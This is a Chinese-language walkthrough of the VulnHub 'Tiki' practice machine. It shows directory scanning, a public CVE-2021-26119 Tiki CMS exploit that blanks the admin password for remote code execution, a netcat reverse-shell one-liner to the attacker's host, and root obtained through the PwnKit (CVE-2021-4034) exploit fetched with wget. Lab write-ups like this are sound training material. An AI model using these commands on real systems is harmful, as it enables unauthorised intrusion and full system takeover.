vulnhub-Tiki - 类oscp靶机攻略1

vulnhub-Tiki

Date: 07/14/2022
Difficulty: Easy
Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l

https://www.vulnhub.com/entry/tiki_1,525/

信息搜集

端口扫描

目录扫描

➜  ~ dirsearch -u http://192.168.31.138
[06:15:28] Starting: 
[06:15:30] 403 -  279B  - /.ht_wsr.txt                                     
[06:15:30] 403 -  279B  - /.htaccess.orig
[06:15:30] 403 -  279B  - /.htaccess.bak1
[06:15:30] 403 -  279B  - /.htaccessBAK
[06:15:30] 403 -  279B  - /.htaccess_sc
[06:15:30] 403 -  279B  - /.htaccess.save
[06:15:30] 403 -  279B  - /.htaccess.sample
[06:15:30] 403 -  279B  - /.htaccessOLD
[06:15:30] 403 -  279B  - /.htaccess_orig
[06:15:30] 403 -  279B  - /.htaccessOLD2
[06:15:30] 403 -  279B  - /.html                                           
[06:15:30] 403 -  279B  - /.htpasswds
[06:15:30] 403 -  279B  - /.htm
[06:15:30] 403 -  279B  - /.htpasswd_test
[06:15:30] 403 -  279B  - /.httr-oauth
[06:15:31] 403 -  279B  - /.php                                            
[06:15:31] 403 -  279B  - /.htaccess_extra                                 
[06:15:59] 200 -   11KB - /index.html                                       
[06:16:11] 200 -   42B  - /robots.txt                                       
[06:16:11] 403 -  279B  - /server-status                                    
[06:16:11] 403 -  279B  - /server-status/
[06:16:16] 200 -  526B  - /tiki/doc/stable.version

在 robots.txt 中扫出

加上再次扫描得到版本信息

http://192.168.31.138/tiki/changelog.txt

方法一

2022年tiki cms 出了新的漏洞，所以能一键利用了

https://srcincite.io/pocs/cve-2021-26119.py.txt

验证

➜  Tiki python3 exp.py  192.168.31.138 /tiki id
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...

uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹shell

➜  Tiki python3 exp.py  192.168.31.138 /tiki "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.134 1234 >/tmp/f"
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...

提权

git clone https://github.com/berdav/CVE-2021-4034.git

python3 -m http.server 80
wget 192.168.31.134/cve-2021-4034.c
wget 192.168.31.134/Makefile
wget 192.168.31.134/pwnkit.c
wget 192.168.31.134/pwnkit.so

www-data@ubuntu:/tmp$ make 
make
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
www-data@ubuntu:/tmp$ ls
ls
 CVE-2021-4034.git   cve-2021-4034     gconv-modules   pwnkit.so
'GCONV_PATH=.'       cve-2021-4034.c   linpeas.sh      pwnkit.so.1
 Makefile            f                 pwnkit.c
www-data@ubuntu:/tmp$ ./cve-2021-4034
./cve-2021-4034
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

方法二

➜  ~ searchsploit tiki 21
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass                                                 | php/webapps/48927.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

跑脚本，burp登录后使用 cookie 在网页登录得到账号密码

sudo su 得到 root